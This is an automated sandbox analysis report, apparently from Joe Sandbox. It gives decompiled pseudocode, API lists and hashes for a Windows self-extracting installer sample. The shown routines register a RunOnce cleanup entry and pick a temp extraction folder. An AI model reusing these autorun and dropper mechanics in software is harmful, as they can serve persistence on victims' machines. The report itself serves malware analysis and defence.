                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00946F40() {
                            
                            				SetUnhandledExceptionFilter(E00946EF0); // executed
                            				return 0;
                            			}



                            0x00946f45
                            0x00946f4d

                            APIs
                            • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00946F45
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: bf30c0aa323700aab2c95b0b88f5c5d98b8af1f714ee599c69d603e7cdc2fc45
                            • Instruction ID: c1263b0980fcceb9e2e09af5dfb2020d4b57935e52903f4f98797ba8dfcc69bb
                            • Opcode Fuzzy Hash: bf30c0aa323700aab2c95b0b88f5c5d98b8af1f714ee599c69d603e7cdc2fc45
                            • Instruction Fuzzy Hash: 409002AC2A91405796141B749D19C1675D15A8F606B815460A111C4494DB6044506513
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 93%
                            			E0094202A(struct HINSTANCE__* __edx) {
                            				signed int _v8;
                            				char _v268;
                            				char _v528;
                            				void* _v532;
                            				int _v536;
                            				int _v540;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t28;
                            				long _t36;
                            				long _t41;
                            				struct HINSTANCE__* _t46;
                            				intOrPtr _t49;
                            				intOrPtr _t50;
                            				CHAR* _t54;
                            				void _t56;
                            				signed int _t66;
                            				intOrPtr* _t72;
                            				void* _t73;
                            				void* _t75;
                            				void* _t80;
                            				intOrPtr* _t81;
                            				void* _t86;
                            				void* _t87;
                            				void* _t90;
                            				_Unknown_base(*)()* _t91;
                            				signed int _t93;
                            				void* _t94;
                            				void* _t95;
                            
                            				_t79 = __edx;
                            				_t28 =  *0x948004; // 0xec518a5e
                            				_v8 = _t28 ^ _t93;
                            				_t84 = 0x104;
                            				memset( &_v268, 0, 0x104);
                            				memset( &_v528, 0, 0x104);
                            				_t95 = _t94 + 0x18;
                            				_t66 = 0;
                            				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                            				if(_t36 != 0) {
                            					L24:
                            					return E00946CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                            				}
                            				_push(_t86);
                            				_t87 = 0;
                            				while(1) {
                            					E0094171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
                            					_t95 = _t95 + 0x10;
                            					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
                            					if(_t41 != 0) {
                            						break;
                            					}
                            					_t87 = _t87 + 1;
                            					if(_t87 < 0xc8) {
                            						continue;
                            					}
                            					break;
                            				}
                            				if(_t87 != 0xc8) {
                            					GetSystemDirectoryA( &_v528, _t84);
                            					_t79 = _t84;
                            					E0094658A( &_v528, _t84, "advpack.dll");
                            					_t46 = LoadLibraryA( &_v528); // executed
                            					_t84 = _t46;
                            					if(_t84 == 0) {
                            						L10:
                            						if(GetModuleFileNameA( *0x949a3c,  &_v268, 0x104) == 0) {
                            							L17:
                            							_t36 = RegCloseKey(_v532);
                            							L23:
                            							_pop(_t86);
                            							goto L24;
                            						}
                            						L11:
                            						_t72 =  &_v268;
                            						_t80 = _t72 + 1;
                            						do {
                            							_t49 =  *_t72;
                            							_t72 = _t72 + 1;
                            						} while (_t49 != 0);
                            						_t73 = _t72 - _t80;
                            						_t81 = 0x9491e4;
                            						do {
                            							_t50 =  *_t81;
                            							_t81 = _t81 + 1;
                            						} while (_t50 != 0);
                            						_t84 = _t73 + 0x50 + _t81 - 0x9491e5;
                            						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x9491e5);
                            						if(_t90 != 0) {
                            							 *0x948580 = _t66 ^ 0x00000001;
                            							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                            							if(_t66 == 0) {
                            								_t54 = "%s /D:%s";
                            							}
                            							_push("C:\Users\engineer\AppData\Local\Temp\IXP001.TMP\");
                            							E0094171E(_t90, _t84, _t54,  &_v268);
                            							_t75 = _t90;
                            							_t23 = _t75 + 1; // 0x1
                            							_t79 = _t23;
                            							do {
                            								_t56 =  *_t75;
                            								_t75 = _t75 + 1;
                            							} while (_t56 != 0);
                            							_t24 = _t75 - _t79 + 1; // 0x2
                            							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
                            							RegCloseKey(_v532); // executed
                            							_t36 = LocalFree(_t90);
                            							goto L23;
                            						}
                            						_t79 = 0x4b5;
                            						E009444B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                            						goto L17;
                            					}
                            					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                            					_t66 = 0 | _t91 != 0x00000000;
                            					FreeLibrary(_t84); // executed
                            					if(_t91 == 0) {
                            						goto L10;
                            					}
                            					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                            						E0094658A( &_v268, 0x104, 0x941140);
                            					}
                            					goto L11;
                            				}
                            				_t36 = RegCloseKey(_v532);
                            				 *0x948530 = _t66;
                            				goto L23;
                            			}

































                            0x0094202a
                            0x00942035
                            0x0094203c
                            0x00942041
                            0x00942050
                            0x0094205f
                            0x00942064
                            0x0094206f
                            0x0094208c
                            0x00942094
                            0x00942257
                            0x00942266
                            0x00942266
                            0x0094209a
                            0x0094209b
                            0x0094209d
                            0x009420aa
                            0x009420af
                            0x009420c9
                            0x009420d1
                            0x00000000
                            0x00000000
                            0x009420d3
                            0x009420da
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009420da
                            0x009420e2
                            0x00942103
                            0x0094210e
                            0x00942116
                            0x00942122
                            0x00942128
                            0x0094212c
                            0x00942179
                            0x00942194
                            0x009421de
                            0x009421e4
                            0x00942256
                            0x00942256
                            0x00000000
                            0x00942256
                            0x00942196
                            0x00942196
                            0x0094219c
                            0x0094219f
                            0x0094219f
                            0x009421a1
                            0x009421a2
                            0x009421a6
                            0x009421a8
                            0x009421b0
                            0x009421b0
                            0x009421b2
                            0x009421b3
                            0x009421bc
                            0x009421c7
                            0x009421cb
                            0x009421f1
                            0x009421f6
                            0x009421fd
                            0x009421ff
                            0x009421ff
                            0x00942204
                            0x00942213
                            0x00942218
                            0x0094221d
                            0x0094221d
                            0x00942220
                            0x00942220
                            0x00942222
                            0x00942223
                            0x00942229
                            0x0094223d
                            0x00942249
                            0x00942250
                            0x00000000
                            0x00942250
                            0x009421d2
                            0x009421d9
                            0x00000000
                            0x009421d9
                            0x0094213a
                            0x00942141
                            0x00942144
                            0x0094214c
                            0x00000000
                            0x00000000
                            0x00942163
                            0x00942172
                            0x00942172
                            0x00000000
                            0x00942163
                            0x009420ea
                            0x009420f0
                            0x00000000

                            APIs
                            • memset.MSVCRT ref: 00942050
                            • memset.MSVCRT ref: 0094205F
                            • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0094208C
                              • Part of subcall function 0094171E: _vsnprintf.MSVCRT ref: 00941750
                            • RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009420C9
                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009420EA
                            • GetSystemDirectoryA.KERNEL32 ref: 00942103
                            • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00942122
                            • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00942134
                            • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00942144
                            • GetSystemDirectoryA.KERNEL32 ref: 0094215B
                            • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0094218C
                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009421C1
                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009421E4
                            • RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0094223D
                            • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00942249
                            • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00942250
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                            • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
                            • API String ID: 178549006-4141939531
                            • Opcode ID: bbf72143c9274c87658aa41e6b16e5ea3cb6183c781d51575dd1c5b86b4a21f9
                            • Instruction ID: 92f346fa11f91f70911e90940fbbaf0545b6343f321e1fa4ce1f8c62aa601fb5
                            • Opcode Fuzzy Hash: bbf72143c9274c87658aa41e6b16e5ea3cb6183c781d51575dd1c5b86b4a21f9
                            • Instruction Fuzzy Hash: CA513475A58214ABDB209B60DC49FFB777CFF96700F0001A4FA09E3151EAB09E89CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 232 9455a0-9455d9 call 94468f LocalAlloc 235 9455fd-94560c call 94468f 232->235 236 9455db-9455f1 call 9444b9 call 946285 232->236 242 945632-945643 lstrcmpA 235->242 243 94560e-945630 call 9444b9 LocalFree 235->243 251 9455f6-9455f8 236->251 244 945645 242->244 245 94564b-945659 LocalFree 242->245 243->251 244->245 249 945696-94569c 245->249 250 94565b-94565d 245->250 255 9456a2-9456a8 249->255 256 94589f-9458b5 call 946517 249->256 252 94565f-945667 250->252 253 945669 250->253 254 9458b7-9458c7 call 946ce0 251->254 252->253 257 94566b-94567a call 945467 252->257 253->257 255->256 260 9456ae-9456c1 GetTempPathA 255->260 256->254 270 945680-945691 call 9444b9 257->270 271 94589b-94589d 257->271 261 9456f3-945711 call 941781 260->261 262 9456c3-9456c9 call 945467 260->262 275 945717-945729 GetDriveTypeA 261->275 276 94586c-945890 GetWindowsDirectoryA call 94597d 261->276 269 9456ce-9456d0 262->269 269->271 273 9456d6-9456df call 942630 269->273 270->251 271->254 273->261 288 9456e1-9456ed call 945467 273->288 280 945730-945740 GetFileAttributesA 275->280 281 94572b-94572e 275->281 276->261 289 945896 276->289 284 945742-945745 280->284 285 94577e-94578f call 94597d 280->285 281->280 281->284 286 945747-94574f 284->286 287 94576b 284->287 298 945791-94579e call 942630 285->298 299 9457b2-9457bf call 942630 285->299 291 945771-945779 286->291 292 945751-945753 286->292 287->291 288->261 288->271 289->271 296 945864-945866 291->296 292->291 295 945755-945762 call 946952 292->295 295->287 308 945764-945769 295->308 296->275 296->276 298->287 309 9457a0-9457b0 call 94597d 298->309 306 9457c1-9457cd GetWindowsDirectoryA 299->306 307 9457d3-9457f8 call 94658a GetFileAttributesA 299->307 306->307 314 94580a 307->314 315 9457fa-945808 CreateDirectoryA 307->315 308->285 308->287 309->287 309->299 316 94580d-94580f 314->316 315->316 317 945827-94585c SetFileAttributesA call 941781 call 945467 316->317 318 945811-945825 316->318 317->271 323 94585e 317->323 318->296 323->296
                            C-Code - Quality: 92%
                            			E009455A0(void* __eflags) {
                            				signed int _v8;
                            				char _v265;
                            				char _v268;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t28;
                            				int _t32;
                            				int _t33;
                            				int _t35;
                            				signed int _t36;
                            				signed int _t38;
                            				int _t40;
                            				int _t44;
                            				long _t48;
                            				int _t49;
                            				int _t50;
                            				signed int _t53;
                            				int _t54;
                            				int _t59;
                            				char _t60;
                            				int _t65;
                            				char _t66;
                            				int _t67;
                            				int _t68;
                            				int _t69;
                            				int _t70;
                            				int _t71;
                            				struct _SECURITY_ATTRIBUTES* _t72;
                            				int _t73;
                            				CHAR* _t82;
                            				CHAR* _t88;
                            				void* _t103;
                            				signed int _t110;
                            
                            				_t28 =  *0x948004; // 0xec518a5e
                            				_v8 = _t28 ^ _t110;
                            				_t2 = E0094468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                            				_t109 = LocalAlloc(0x40, _t2);
                            				if(_t109 != 0) {
                            					_t82 = "RUNPROGRAM";
                            					_t32 = E0094468F(_t82, _t109, 1);
                            					__eflags = _t32;
                            					if(_t32 != 0) {
                            						_t33 = lstrcmpA(_t109, "<None>");
                            						__eflags = _t33;
                            						if(_t33 == 0) {
                            							 *0x949a30 = 1;
                            						}
                            						LocalFree(_t109);
                            						_t35 =  *0x948b3e; // 0x0
                            						__eflags = _t35;
                            						if(_t35 == 0) {
                            							__eflags =  *0x948a24; // 0x0
                            							if(__eflags != 0) {
                            								L46:
                            								_t101 = 0x7d2;
                            								_t36 = E00946517(_t82, 0x7d2, 0, E00943210, 0, 0);
                            								asm("sbb eax, eax");
                            								_t38 =  ~( ~_t36);
                            							} else {
                            								__eflags =  *0x949a30; // 0x0
                            								if(__eflags != 0) {
                            									goto L46;
                            								} else {
                            									_t109 = 0x9491e4;
                            									_t40 = GetTempPathA(0x104, 0x9491e4);
                            									__eflags = _t40;
                            									if(_t40 == 0) {
                            										L19:
                            										_push(_t82);
                            										E00941781( &_v268, 0x104, _t82, "A:\\");
                            										__eflags = _v268 - 0x5a;
                            										if(_v268 <= 0x5a) {
                            											do {
                            												_t109 = GetDriveTypeA( &_v268);
                            												__eflags = _t109 - 6;
                            												if(_t109 == 6) {
                            													L22:
                            													_t48 = GetFileAttributesA( &_v268);
                            													__eflags = _t48 - 0xffffffff;
                            													if(_t48 != 0xffffffff) {
                            														goto L30;
                            													} else {
                            														goto L23;
                            													}
                            												} else {
                            													__eflags = _t109 - 3;
                            													if(_t109 != 3) {
                            														L23:
                            														__eflags = _t109 - 2;
                            														if(_t109 != 2) {
                            															L28:
                            															_t66 = _v268;
                            															goto L29;
                            														} else {
                            															_t66 = _v268;
                            															__eflags = _t66 - 0x41;
                            															if(_t66 == 0x41) {
                            																L29:
                            																_t60 = _t66 + 1;
                            																_v268 = _t60;
                            																goto L42;
                            															} else {
                            																__eflags = _t66 - 0x42;
                            																if(_t66 == 0x42) {
                            																	goto L29;
                            																} else {
                            																	_t68 = E00946952( &_v268);
                            																	__eflags = _t68;
                            																	if(_t68 == 0) {
                            																		goto L28;
                            																	} else {
                            																		__eflags = _t68 - 0x19000;
                            																		if(_t68 >= 0x19000) {
                            																			L30:
                            																			_push(0);
                            																			_t103 = 3;
                            																			_t49 = E0094597D( &_v268, _t103, 1);
                            																			__eflags = _t49;
                            																			if(_t49 != 0) {
                            																				L33:
                            																				_t50 = E00942630(0,  &_v268, 1);
                            																				__eflags = _t50;
                            																				if(_t50 != 0) {
                            																					GetWindowsDirectoryA( &_v268, 0x104);
                            																				}
                            																				_t88 =  &_v268;
                            																				E0094658A(_t88, 0x104, "msdownld.tmp");
                            																				_t53 = GetFileAttributesA( &_v268);
                            																				__eflags = _t53 - 0xffffffff;
                            																				if(_t53 != 0xffffffff) {
                            																					_t54 = _t53 & 0x00000010;
                            																					__eflags = _t54;
                            																				} else {
                            																					_t54 = CreateDirectoryA( &_v268, 0);
                            																				}
                            																				__eflags = _t54;
                            																				if(_t54 != 0) {
                            																					SetFileAttributesA( &_v268, 2);
                            																					_push(_t88);
                            																					_t109 = 0x9491e4;
                            																					E00941781(0x9491e4, 0x104, _t88,  &_v268);
                            																					_t101 = 1;
                            																					_t59 = E00945467(0x9491e4, 1, 0);
                            																					__eflags = _t59;
                            																					if(_t59 != 0) {
                            																						goto L45;
                            																					} else {
                            																						_t60 = _v268;
                            																						goto L42;
                            																					}
                            																				} else {
                            																					_t60 = _v268 + 1;
                            																					_v265 = 0;
                            																					_v268 = _t60;
                            																					goto L42;
                            																				}
                            																			} else {
                            																				_t65 = E00942630(0,  &_v268, 1);
                            																				__eflags = _t65;
                            																				if(_t65 != 0) {
                            																					goto L28;
                            																				} else {
                            																					_t67 = E0094597D( &_v268, 1, 1, 0);
                            																					__eflags = _t67;
                            																					if(_t67 == 0) {
                            																						goto L28;
                            																					} else {
                            																						goto L33;
                            																					}
                            																				}
                            																			}
                            																		} else {
                            																			goto L28;
                            																		}
                            																	}
                            																}
                            															}
                            														}
                            													} else {
                            														goto L22;
                            													}
                            												}
                            												goto L47;
                            												L42:
                            												__eflags = _t60 - 0x5a;
                            											} while (_t60 <= 0x5a);
                            										}
                            										goto L43;
                            									} else {
                            										_t101 = 1;
                            										_t69 = E00945467(0x9491e4, 1, 3); // executed
                            										__eflags = _t69;
                            										if(_t69 != 0) {
                            											goto L45;
                            										} else {
                            											_t82 = 0x9491e4;
                            											_t70 = E00942630(0, 0x9491e4, 1);
                            											__eflags = _t70;
                            											if(_t70 != 0) {
                            												goto L19;
                            											} else {
                            												_t101 = 1;
                            												_t82 = 0x9491e4;
                            												_t71 = E00945467(0x9491e4, 1, 1);
                            												__eflags = _t71;
                            												if(_t71 != 0) {
                            													goto L45;
                            												} else {
                            													do {
                            														goto L19;
                            														L43:
                            														GetWindowsDirectoryA( &_v268, 0x104);
                            														_push(4);
                            														_t101 = 3;
                            														_t82 =  &_v268;
                            														_t44 = E0094597D(_t82, _t101, 1);
                            														__eflags = _t44;
                            													} while (_t44 != 0);
                            													goto L2;
                            												}
                            											}
                            										}
                            									}
                            								}
                            							}
                            						} else {
                            							__eflags = _t35 - 0x5c;
                            							if(_t35 != 0x5c) {
                            								L10:
                            								_t72 = 1;
                            							} else {
                            								__eflags =  *0x948b3f - _t35; // 0x0
                            								_t72 = 0;
                            								if(__eflags != 0) {
                            									goto L10;
                            								}
                            							}
                            							_t101 = 0;
                            							_t73 = E00945467(0x948b3e, 0, _t72);
                            							__eflags = _t73;
                            							if(_t73 != 0) {
                            								L45:
                            								_t38 = 1;
                            							} else {
                            								_t101 = 0x4be;
                            								E009444B9(0, 0x4be, 0, 0, 0x10, 0);
                            								goto L2;
                            							}
                            						}
                            					} else {
                            						_t101 = 0x4b1;
                            						E009444B9(0, 0x4b1, 0, 0, 0x10, 0);
                            						LocalFree(_t109);
                            						 *0x949124 = 0x80070714;
                            						goto L2;
                            					}
                            				} else {
                            					_t101 = 0x4b5;
                            					E009444B9(0, 0x4b5, 0, 0, 0x10, 0);
                            					 *0x949124 = E00946285();
                            					L2:
                            					_t38 = 0;
                            				}
                            				L47:
                            				return E00946CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                            			}





































                            0x009455ab
                            0x009455b2
                            0x009455c9
                            0x009455d5
                            0x009455d9
                            0x00945600
                            0x00945605
                            0x0094560a
                            0x0094560c
                            0x00945638
                            0x00945641
                            0x00945643
                            0x00945645
                            0x00945645
                            0x0094564c
                            0x00945652
                            0x00945657
                            0x00945659
                            0x00945696
                            0x0094569c
                            0x0094589f
                            0x009458a7
                            0x009458ac
                            0x009458b3
                            0x009458b5
                            0x009456a2
                            0x009456a2
                            0x009456a8
                            0x00000000
                            0x009456ae
                            0x009456ae
                            0x009456b9
                            0x009456bf
                            0x009456c1
                            0x009456f3
                            0x009456f3
                            0x00945705
                            0x0094570a
                            0x00945711
                            0x00945717
                            0x00945724
                            0x00945726
                            0x00945729
                            0x00945730
                            0x00945737
                            0x0094573d
                            0x00945740
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0094572b
                            0x0094572b
                            0x0094572e
                            0x00945742
                            0x00945742
                            0x00945745
                            0x0094576b
                            0x0094576b
                            0x00000000
                            0x00945747
                            0x00945747
                            0x0094574d
                            0x0094574f
                            0x00945771
                            0x00945771
                            0x00945773
                            0x00000000
                            0x00945751
                            0x00945751
                            0x00945753
                            0x00000000
                            0x00945755
                            0x0094575b
                            0x00945760
                            0x00945762
                            0x00000000
                            0x00945764
                            0x00945764
                            0x00945769
                            0x0094577e
                            0x0094577e
                            0x00945781
                            0x00945788
                            0x0094578d
                            0x0094578f
                            0x009457b2
                            0x009457b8
                            0x009457bd
                            0x009457bf
                            0x009457cd
                            0x009457cd
                            0x009457dd
                            0x009457e3
                            0x009457ef
                            0x009457f5
                            0x009457f8
                            0x0094580a
                            0x0094580a
                            0x009457fa
                            0x00945802
                            0x00945802
                            0x0094580d
                            0x0094580f
                            0x00945830
                            0x00945836
                            0x0094583d
                            0x0094584b
                            0x00945851
                            0x00945855
                            0x0094585a
                            0x0094585c
                            0x00000000
                            0x0094585e
                            0x0094585e
                            0x00000000
                            0x0094585e
                            0x00945811
                            0x00945817
                            0x00945819
                            0x0094581f
                            0x00000000
                            0x0094581f
                            0x00945791
                            0x00945797
                            0x0094579c
                            0x0094579e
                            0x00000000
                            0x009457a0
                            0x009457a9
                            0x009457ae
                            0x009457b0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009457b0
                            0x0094579e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00945769
                            0x00945762
                            0x00945753
                            0x0094574f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0094572e
                            0x00000000
                            0x00945864
                            0x00945864
                            0x00945864
                            0x00945717
                            0x00000000
                            0x009456c3
                            0x009456c5
                            0x009456c9
                            0x009456ce
                            0x009456d0
                            0x00000000
                            0x009456d6
                            0x009456d6
                            0x009456d8
                            0x009456dd
                            0x009456df
                            0x00000000
                            0x009456e1
                            0x009456e2
                            0x009456e4
                            0x009456e6
                            0x009456eb
                            0x009456ed
                            0x00000000
                            0x009456f3
                            0x009456f3
                            0x00000000
                            0x0094586c
                            0x00945878
                            0x0094587e
                            0x00945882
                            0x00945883
                            0x00945889
                            0x0094588e
                            0x0094588e
                            0x00000000
                            0x00945896
                            0x009456ed
                            0x009456df
                            0x009456d0
                            0x009456c1
                            0x009456a8
                            0x0094565b
                            0x0094565b
                            0x0094565d
                            0x00945669
                            0x00945669
                            0x0094565f
                            0x0094565f
                            0x00945665
                            0x00945667
                            0x00000000
                            0x00000000
                            0x00945667
                            0x0094566c
                            0x00945673
                            0x00945678
                            0x0094567a
                            0x0094589b
                            0x0094589b
                            0x00945680
                            0x00945685
                            0x0094568c
                            0x00000000
                            0x0094568c
                            0x0094567a
                            0x0094560e
                            0x00945613
                            0x0094561a
                            0x00945620
                            0x00945626
                            0x00000000
                            0x00945626
                            0x009455db
                            0x009455e0
                            0x009455e7
                            0x009455f1
                            0x009455f6
                            0x009455f6
                            0x009455f6
                            0x009458b7
                            0x009458c7

                            APIs
                              • Part of subcall function 0094468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446A0
                              • Part of subcall function 0094468F: SizeofResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446A9
                              • Part of subcall function 0094468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446C3
                              • Part of subcall function 0094468F: LoadResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446CC
                              • Part of subcall function 0094468F: LockResource.KERNEL32(00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446D3
                              • Part of subcall function 0094468F: memcpy_s.MSVCRT ref: 009446E5
                              • Part of subcall function 0094468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009446EF
                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 009455CF
                            • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00945638
                            • LocalFree.KERNEL32(00000000), ref: 0094564C
                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00945620
                              • Part of subcall function 009444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00944518
                              • Part of subcall function 009444B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00944554
                              • Part of subcall function 00946285: GetLastError.KERNEL32(00945BBC), ref: 00946285
                            • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 009456B9
                            • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0094571E
                            • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00945737
                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 009457CD
                            • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 009457EF
                            • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00945802
                              • Part of subcall function 00942630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00942654
                            • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00945830
                              • Part of subcall function 00946517: FindResourceA.KERNEL32(00940000,000007D6,00000005), ref: 0094652A
                              • Part of subcall function 00946517: LoadResource.KERNEL32(00940000,00000000,?,?,00942EE8,00000000,009419E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00946538
                              • Part of subcall function 00946517: DialogBoxIndirectParamA.USER32(00940000,00000000,00000547,009419E0,00000000), ref: 00946557
                              • Part of subcall function 00946517: FreeResource.KERNEL32(00000000,?,?,00942EE8,00000000,009419E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00946560
                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00945878
                              • Part of subcall function 0094597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 009459A8
                              • Part of subcall function 0094597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 009459AF
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                            • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                            • API String ID: 2436801531-2692175070
                            • Opcode ID: f85f294f7960396fd595c1d423bb553776e84f775db0ce1c512c22da7ef84b6b
                            • Instruction ID: 3e75d24d56aefee9c5c3b112e76da0573e8c851f304681dab012e756b4f71d6b
                            • Opcode Fuzzy Hash: f85f294f7960396fd595c1d423bb553776e84f775db0ce1c512c22da7ef84b6b
                            • Instruction Fuzzy Hash: EE812975A08A049BDB20ABB48C85FFF73AD9BA6344F460066F586D2192EF748DC1CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
